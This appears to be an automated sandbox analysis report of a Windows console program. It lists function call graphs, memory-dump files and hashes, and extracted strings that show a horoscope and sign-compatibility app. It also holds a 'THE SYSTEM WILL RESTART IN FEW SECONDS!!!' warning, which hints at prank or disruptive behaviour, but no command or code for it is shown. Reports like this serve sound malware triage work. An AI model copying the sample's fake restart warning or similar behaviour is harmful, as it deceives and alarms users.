                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E90
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EB9
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1ECD
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EE1
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EF5
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F09
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F1D
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F31
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F45
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F59
                                                                            • Part of subcall function 013D1E40: _wscanf.LIBCMT ref: 013D1F67
                                                                          • __wsystem.LIBCMT ref: 013D7722
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D7737
                                                                          • _wprintf.LIBCMT ref: 013D776D
                                                                          • _wprintf.LIBCMT ref: 013D7781
                                                                          • _wprintf.LIBCMT ref: 013D7795
                                                                          • _wprintf.LIBCMT ref: 013D77A9
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D774F
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D77D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__fread_nolock__wsystem_wscanf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_flsall_free
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$..-"-._.-"-._.-$..-"-._.-"-._.-$Age=%d$Name: %s$Sex=%c$Your horoscope sign is Aquarius-The Water Bearer$cls
                                                                          • API String ID: 2439533185-481360102
                                                                          • Opcode ID: cb9b72e057c69225742de04e2792c95a1877a41c093f217eb77a36e8ce004a94
                                                                          • Instruction ID: 7204e8a562c0e8e6ca72b53a3b5f89a69ef7b30087b6043930245936a8081b0b
                                                                          • Opcode Fuzzy Hash: cb9b72e057c69225742de04e2792c95a1877a41c093f217eb77a36e8ce004a94
                                                                          • Instruction Fuzzy Hash: 5C0156B7540383BEC610BBEFFD49D5EB768AB6776CF02061CE61865208DB704008C762
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D2D35, Relevance: 28.0, APIs: 5, Strings: 11, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                            • Part of subcall function 013D1E40: __wsystem.LIBCMT ref: 013D1E4D
                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E78
                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E90
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EB9
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1ECD
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EE1
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EF5
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F09
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F1D
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F31
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F45
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F59
                                                                            • Part of subcall function 013D1E40: _wscanf.LIBCMT ref: 013D1F67
                                                                          • __wsystem.LIBCMT ref: 013D2D4D
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D2D62
                                                                          • _wprintf.LIBCMT ref: 013D2D98
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D15DF
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D15F3
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D1607
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D161B
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D162F
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D2D7A
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D2DE3
                                                                          Strings
                                                                          • * You seem naturally to resent all criticism, and the only way to offset this in you is by quiet logic, reason, and proof., xrefs: 013D2DBA
                                                                          • * The lower type of this sign will stick at nothing to accomplish your purpose. The higher type are good masters, but at the same time severe in discipline and more or less unbending in everything you expect from other people., xrefs: 013D2DC8
                                                                          • * These people are usually independent in everything you do., xrefs: 013D2DC1
                                                                          • THE SYSTEM WILL RESTART IN FEW SECONDS!!!, xrefs: 013D2DDE
                                                                          • * You have unusually strong willpower and great obstinancy of purpose, xrefs: 013D2DA5
                                                                          • * You also have the greatest ability as organizer on a large scale. You find yourself as the organizers of big schemes or as the heads of big businesses, and also in the organization and development of countries., xrefs: 013D2DB3
                                                                          • Age=%d, xrefs: 013D2D6B
                                                                          • Name: %s, xrefs: 013D2D53
                                                                          • Sex=%c, xrefs: 013D2D93
                                                                          • cls, xrefs: 013D2D48
                                                                          • * You are born to be fighter in every sense of the world, xrefs: 013D2DAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__fread_nolock__wsystem_wscanf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_flsall_free
                                                                          • String ID: * The lower type of this sign will stick at nothing to accomplish your purpose. The higher type are good masters, but at the same time severe in discipline and more or less unbending in everything you expect from other people.$* These people are usually independent in everything you do.$* You also have the greatest ability as organizer on a large scale. You find yourself as the organizers of big schemes or as the heads of big businesses, and also in the organization and development of countries.$* You are born to be fighter in every sense of the world$* You have unusually strong willpower and great obstinancy of purpose$* You seem naturally to resent all criticism, and the only way to offset this in you is by quiet logic, reason, and proof.$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$cls
                                                                          • API String ID: 2439533185-1258521768
                                                                          • Opcode ID: d754d267f19f6ce6cfd067a33033bb56d9ff02ae2dd9bd7e14feddc60f26bd02
                                                                          • Instruction ID: 1e653cd7396fc5e0eb11d5b89a9436f0c2810678722cd2529359dc1e26c17514
                                                                          • Opcode Fuzzy Hash: d754d267f19f6ce6cfd067a33033bb56d9ff02ae2dd9bd7e14feddc60f26bd02
                                                                          • Instruction Fuzzy Hash: C50188BAD40246EEC714BFEEB84589FBAB8AB5736DF41011CE55475204DB70411C87F2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D34FB, Relevance: 24.5, APIs: 4, Strings: 10, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                            • Part of subcall function 013D1E40: __wsystem.LIBCMT ref: 013D1E4D
                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E78
                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E90
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EB9
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1ECD
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EE1
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EF5
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F09
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F1D
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F31
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F45
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F59
                                                                            • Part of subcall function 013D1E40: _wscanf.LIBCMT ref: 013D1F67
                                                                          • __wsystem.LIBCMT ref: 013D3513
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D352B
                                                                          • _wprintf.LIBCMT ref: 013D3544
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D3565
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D164F
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D1663
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D1677
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D168B
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D169F
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D16B3
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D16C7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          Strings
                                                                          • 2R, xrefs: 013D35A9
                                                                          • * You have a curious power of dominating others, even when not conscious of trying to do so., xrefs: 013D3582
                                                                          • * You tend to be very patient, practical and dedicated., xrefs: 013D3572
                                                                          • * If you are in love, you are generous to the last degree, and will consider no sacrifice too great for the person you care for., xrefs: 013D358A
                                                                          • * You are usually very cautious when dealing with people, life and money., xrefs: 013D357A
                                                                          • Age=%d, xrefs: 013D3535
                                                                          • Name: %s, xrefs: 013D351C
                                                                          • * If you are enemy, you will fight with the most determined obstinacy., xrefs: 013D3592
                                                                          • cls, xrefs: 013D350E
                                                                          • Sex=%c, xrefs: 013D3560
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__fread_nolock__wsystem_wscanf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_flsall_free
                                                                          • String ID: * If you are enemy, you will fight with the most determined obstinacy.$* If you are in love, you are generous to the last degree, and will consider no sacrifice too great for the person you care for.$* You are usually very cautious when dealing with people, life and money.$* You have a curious power of dominating others, even when not conscious of trying to do so.$* You tend to be very patient, practical and dedicated.$Age=%d$Name: %s$Sex=%c$cls$2R
                                                                          • API String ID: 2439533185-3885263479
                                                                          • Opcode ID: 73ff94efcbe8bb4d97f66c8c485bb4077ecad400734013872a43c28a66580f1e
                                                                          • Instruction ID: d5d7d17e58abbdc247403fdd1736e35d225e23efa8984e2098acb5ec4f52c07c
                                                                          • Opcode Fuzzy Hash: 73ff94efcbe8bb4d97f66c8c485bb4077ecad400734013872a43c28a66580f1e
                                                                          • Instruction Fuzzy Hash: AC01DBF7504341AFC1107FEEF80985FBAA8ABA63ADF410A5CF54C55204DB30801C87A3
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1850, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: ' `:--.--.$(J$Your horoscope sign is Virgo-The Virgin$| | | )$| | |/$| | |_
                                                                          • API String ID: 2991887721-3360323719
                                                                          • Opcode ID: 46165008fb37589ea92e09fcda01efbde4d64eefa602da27cb42efb3ad2b4a58
                                                                          • Instruction ID: f98db168dc78ea1b7aaff9185563686b74f1f51765b1e7db702303c83ad9abd7
                                                                          • Opcode Fuzzy Hash: 46165008fb37589ea92e09fcda01efbde4d64eefa602da27cb42efb3ad2b4a58
                                                                          • Instruction Fuzzy Hash: 98F0ACA69443C269D610BB5BB91AB09765A779773CF42061CD11415728EBF8000CC761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1640, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: '.___.'$. .$.' `.$: :$Your horoscope sign is Taurus-The Bull$`.___.'
                                                                          • API String ID: 2991887721-3145361459
                                                                          • Opcode ID: ac36fdf3cde52063577cc7db3f504197919370e04f2e25ccf5dbf76aaa89fe7c
                                                                          • Instruction ID: 16b3523f1722fccf9b561887927bad5c6b889c5dd88ea9f025f60502cbc2a7f1
                                                                          • Opcode Fuzzy Hash: ac36fdf3cde52063577cc7db3f504197919370e04f2e25ccf5dbf76aaa89fe7c
                                                                          • Instruction Fuzzy Hash: C8F04C665483C379C210BB56B909B0B665AB75777CF830A1CD25426718EBB40108C751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1940, Relevance: 21.0, APIs: 7, Strings: 5, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: ' `:--.--.$Your horoscope sign is Scorpius-The Scorpion$`---':$| | |$| | | ..,
                                                                          • API String ID: 2991887721-2228910097
                                                                          • Opcode ID: 1fd04752f6237ed8d7899499437ca67629f3f4ad4a6f82e9cf9d7869fa24d0b1
                                                                          • Instruction ID: d380b1955db9785c5ad2841406d8718894e646277353162929cfec7aeca8dd51
                                                                          • Opcode Fuzzy Hash: 1fd04752f6237ed8d7899499437ca67629f3f4ad4a6f82e9cf9d7869fa24d0b1
                                                                          • Instruction Fuzzy Hash: BDF015A65843C269C610BB5BB91DA09B76AB7A773CF020A1C921815718EBF8000CC716
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D16D0, Relevance: 21.0, APIs: 7, Strings: 5, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: ' `$._____.$Your horoscope sign is Gemini-The Twins$_|_|_$| |
                                                                          • API String ID: 2991887721-388008371
                                                                          • Opcode ID: 0df46f2cce98be726ab1feb359eaa22675304ab8012458cfc9cc87c366602565
                                                                          • Instruction ID: 88debbc73f806af80150610357d939690be85fc55f419b344be90de1dae71433
                                                                          • Opcode Fuzzy Hash: 0df46f2cce98be726ab1feb359eaa22675304ab8012458cfc9cc87c366602565
                                                                          • Instruction Fuzzy Hash: 2AF04CA69443C2A9D610BB57F909F06765A775673CF430A1CD21926718EBB8001CCB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1760, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D176F
                                                                          • _wprintf.LIBCMT ref: 013D1783
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1797
                                                                          • _wprintf.LIBCMT ref: 013D17AB
                                                                          • _wprintf.LIBCMT ref: 013D17BF
                                                                          • _wprintf.LIBCMT ref: 013D17D3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: `--'$'. /$(_) ( )$.--.$/ _`.$Your horoscope sign is Cancer-The Crab
                                                                          • API String ID: 2991887721-4233921772
                                                                          • Opcode ID: 662066b8c12ae38e60f325d31316a80acce9c9b2f27b475473e14659c4ac0f85
                                                                          • Instruction ID: fa9b74aef57d892be9b8ac8f8dcc840f5bcec165e17e5199fc3f18479184ae5b
                                                                          • Opcode Fuzzy Hash: 662066b8c12ae38e60f325d31316a80acce9c9b2f27b475473e14659c4ac0f85
                                                                          • Instruction Fuzzy Hash: 76E0ED679883C2B9E610BB5BFD09A09665EB75773CF43065C922825618EBB8001CC751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1B90, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D1BE2
                                                                          • _wprintf.LIBCMT ref: 013D1BEC
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                            • Part of subcall function 013EDBFD: __lock.LIBCMT ref: 013EDC0B
                                                                            • Part of subcall function 013EDBFD: __getch_nolock.LIBCMT ref: 013EDC15
                                                                          Strings
                                                                          • This combination is usually hard to match. The powerful sexual attraction is a usual thing for these two signs. A problem is that sexual attraction fades in the face of many temperamental differences. Aries leaps without looking; Cancer is cautious. Cancer lov, xrefs: 013D1BAB
                                                                          • Both Aries and Leo have aggressive temperaments. Both have got egos to burn and both like to lead. Aggressive Aries wouldn't dream of taking second place, and kingly Leo needs constant admiration. This is particularly true if Aries will allow Leo to hold the c, xrefs: 013D1BB2
                                                                          • There is a powerful initial attraction between these two opposites, for in certain areas each supplies what the other lacks. Both are fond of of sexual pleasures, but the Aries probably will try to go too far too quickly. The Libra is inclined to idealize ever, xrefs: 013D1BC0
                                                                          • Both are highly sensual, but Aries may be annoyed by the deliberate pace and unimaginative lovemaking of Taurus. Aries is a fun seeking person and will be trying to entertain him/herself constantly. The thrift of Taurus, who seldom makes anything spontaneously, xrefs: 013D1B9D
                                                                          • Enter any key to continue......, xrefs: 013D1BE7
                                                                          • The bravery of the Aries will probably intrigue the imagination of shy, reserved Virgo for a time. However, their sexualities are so different, that they will have to be very patient in order to succeed. Aires's passions are impulsive and direct. Virgo's sexua, xrefs: 013D1BB9
                                                                          • With these two signs having the same virtues and vices they should get along well together, or at least they will have understanding and sympathy for one another. Their mutual sympathy guarantees that there will be a perfect understanding in the field of sexua, xrefs: 013D1BC7
                                                                          • This union can turn out to be delightful, because both Aries and Gemini are tireless, active, inclined to search for a new knowledge. The Aries' tendency to dominate is limited by an ingenuity of the Twins. The Twins have no sexual prejudices, but their energy, xrefs: 013D1BA4
                                                                          • Both enter with the intent of dominating the scenario. A passionate affair, but neither is content with playing the smaller role. In the sexual relationships between them the woman will dominate. The Aries-man will not stand for a long time the role of subordi, xrefs: 013D1B96, 013D1BD2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__getch_nolock__lock__output_l__stbuf
                                                                          • String ID: Enter any key to continue......$Both Aries and Leo have aggressive temperaments. Both have got egos to burn and both like to lead. Aggressive Aries wouldn't dream of taking second place, and kingly Leo needs constant admiration. This is particularly true if Aries will allow Leo to hold the c$Both are highly sensual, but Aries may be annoyed by the deliberate pace and unimaginative lovemaking of Taurus. Aries is a fun seeking person and will be trying to entertain him/herself constantly. The thrift of Taurus, who seldom makes anything spontaneously$Both enter with the intent of dominating the scenario. A passionate affair, but neither is content with playing the smaller role. In the sexual relationships between them the woman will dominate. The Aries-man will not stand for a long time the role of subordi$The bravery of the Aries will probably intrigue the imagination of shy, reserved Virgo for a time. However, their sexualities are so different, that they will have to be very patient in order to succeed. Aires's passions are impulsive and direct. Virgo's sexua$There is a powerful initial attraction between these two opposites, for in certain areas each supplies what the other lacks. Both are fond of of sexual pleasures, but the Aries probably will try to go too far too quickly. The Libra is inclined to idealize ever$This combination is usually hard to match. The powerful sexual attraction is a usual thing for these two signs. A problem is that sexual attraction fades in the face of many temperamental differences. Aries leaps without looking; Cancer is cautious. Cancer lov$This union can turn out to be delightful, because both Aries and Gemini are tireless, active, inclined to search for a new knowledge. The Aries' tendency to dominate is limited by an ingenuity of the Twins. The Twins have no sexual prejudices, but their energy$With these two signs having the same virtues and vices they should get along well together, or at least they will have understanding and sympathy for one another. Their mutual sympathy guarantees that there will be a perfect understanding in the field of sexua
